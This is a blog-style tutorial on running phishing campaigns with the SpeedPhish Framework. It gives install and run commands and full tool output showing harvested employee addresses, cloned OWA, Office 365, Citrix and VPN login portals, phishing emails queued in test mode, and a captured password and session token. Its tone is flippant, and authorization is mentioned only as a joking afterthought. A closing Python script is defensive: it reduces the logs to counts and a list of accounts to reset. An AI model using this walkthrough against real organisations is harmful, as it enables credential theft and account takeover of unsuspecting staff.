Run phishing attacks in a jiffy with SPF (SpeedPhish Framework)

Are you at the beach bar and feeling the need to hack something or someone? Do you feel the call of social engineering? How about a quick phish? Let me tell you first that you are sick... and then tell you about SPF (SpeedPhish Framework), a tool written in Python designed for quick reconnaissance and deployment of phishing campaigns. So lift the lid of your netbook and start typing...

Requirements & installation

apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git

Running it

cd SPF/spf
python spf.py --all -d dominio.com
(if you have already configured the SMTP relay and do not want to send the emails to the victims, use --test instead)

[!] A CONFIG FILE was not specified...  defaulting to [default.cfg]

/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite

[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet

[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file

[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com

[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2   ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa       ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix    ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com   ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com       ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com    ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]

[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG]   Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG]   Found the following email template: [templates/email/office365.txt]
[*] [DEBUG]   Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG]   Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG]   Found the following email template: [templates/email/owa.txt]

[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.

[*] Monitoring phishing website activity!


Now crack open another beer and wait...


[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']


Bingo!

P.S. It goes without saying that phishing must only be done with prior authorization from the owner or person responsible for the domain and blah, blah,... be good!
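For the write-up of an authorized exercise, the monitoring lines above can be reduced to per-site counts and a list of accounts that need a password reset, without copying the captured passwords or session tokens into the report. This is an added example, not part of SPF or of the original post; the sample lines, the function names and the assumption that every field looks like name=['value'] are constructed from the two event lines shown.

```python
import re
from collections import defaultdict

# Constructed sample in the format of the monitoring lines shown above
# (hosts, users and secrets here are made up for the example).
SAMPLE = """\
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['example-pass'], user=['alice@example.test'], LoginType=['Explicit'], SESSION_TOKEN=['00112233445566778899AABBCCDDEEFF']
[*] ::owa:: 2015.07.16-13.25.10,[ACCESS],192.168.2.9
[*] (Press CTRL-C to stop collection and generate report!)
"""

EVENT = re.compile(r"^\[\*\] ::(?P<site>[^:]+):: (?P<ts>[\d.\-]+),"
                   r"\[(?P<kind>[A-Z]+)\],(?P<ip>[^,\s]+)(?:,(?P<rest>.*))?$")
FIELD = re.compile(r"(\w+)=\['([^']*)'\]")
SECRET_FIELDS = {"password", "SESSION_TOKEN"}  # never copied into the report

def parse_event(line):
    """Return a dict for an event line, or None for any other output line."""
    m = EVENT.match(line.strip())
    if not m:
        return None
    event = {k: m.group(k) for k in ("site", "ts", "kind", "ip")}
    fields = dict(FIELD.findall(m.group("rest") or ""))
    event["user"] = fields.get("user")
    # Record only which secret fields were present, not their values.
    event["secrets_seen"] = sorted(fields.keys() & SECRET_FIELDS)
    return event

def summarize(text):
    """Per-site visit/submission counts plus accounts needing a reset."""
    stats = defaultdict(lambda: {"ACCESS": 0, "CREDENTIALS": 0})
    reset = set()
    for line in text.splitlines():
        ev = parse_event(line)
        if ev is None or ev["kind"] not in ("ACCESS", "CREDENTIALS"):
            continue
        stats[ev["site"]][ev["kind"]] += 1
        if ev["kind"] == "CREDENTIALS" and ev["user"]:
            reset.add(ev["user"].lower())
    return dict(stats), sorted(reset)

if __name__ == "__main__":
    per_site, reset = summarize(SAMPLE)
    print(per_site)
    print("force password reset for:", reset)
```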
